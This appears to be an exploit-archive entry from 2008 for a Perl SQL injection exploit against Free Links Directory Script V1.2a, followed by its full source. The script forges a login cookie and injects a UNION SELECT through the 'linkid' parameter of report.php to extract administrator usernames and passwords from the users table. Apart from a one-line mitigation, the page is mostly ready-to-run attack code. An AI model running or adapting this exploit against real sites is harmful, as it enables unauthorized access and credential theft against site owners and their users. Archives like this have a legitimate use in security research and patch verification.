Free Links Directory Script V1.2a Remote SQL Injection Exploit

vendor:

Free Links Directory Script

by:

ka0x

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Free Links Directory Script

Affected Version From: V1.2a

Affected Version To: V1.2a

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2008

Free Links Directory Script V1.2a Remote SQL Injection Exploit

This exploit allows an attacker to gain access to the username and password of the administrator of the Free Links Directory Script V1.2a. The vulnerability exists due to the lack of input validation in the 'report.php' script, which allows an attacker to inject malicious SQL code into the 'linkid' parameter. The exploit sends a specially crafted HTTP request with a malicious 'Cookie' header, which contains the value 'logged=d0ml4bs'. The malicious SQL code is then injected into the 'linkid' parameter, which allows the attacker to gain access to the username and password of the administrator.

Mitigation:

Input validation should be implemented to prevent SQL injection attacks.

Source

Exploit-DB raw data:

#!/usr/bin/perl -w
#
# Free Links Directory Script V1.2a Remote SQL Injection Exploit
# written by ka0x <ka0x01[alt+64]gmail.com>
# D.O.M Labs Security Researchers
# - www.domlabs.org -
#
# Vuln code (report.php):
#
# if($_COOKIE['logged']=="") {
# [...] // login
# else {
#     $linkida = $_GET['linkid'];
#     $linkinfo = mysql_fetch_array(mysql_query("select * from links where id=$linkida"))
# [...]
#

use strict;
use LWP::UserAgent;
 
my $host = $ARGV[0];

die "[*] usage: perl $0 <host>\n" unless $ARGV[0];

if ($host !~ /^http:/){ $host = 'http://'.$host; }

my $ua = LWP::UserAgent->new() or die ;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1") ;
$ua->timeout(10) ;
$ua->default_header('Cookie' => "logged=d0ml4bs"); # value $_COOKIE['logged'], Cookie: logged=d0ml4bs

my $req = HTTP::Request->new(GET => $host."report.php.php?linkid=-1/**/UNION/**/SELECT/**/1,concat(0x5f5f5f5f,0x5b215d20757365723a20,username,0x20205b215d20706173733a20,password,0x5f5f5f5f),3,4,5,6,7,8,9,10,11/**/FROM/**/users");

my $res = $ua->request($req);
my $con = $res->content;

if ($res->is_success && $con =~ m/____(.*?)____/ms){
    print $1;
}
else {
    print "[-] exploit failed!\n";
}

__END__

# milw0rm.com [2008-12-16]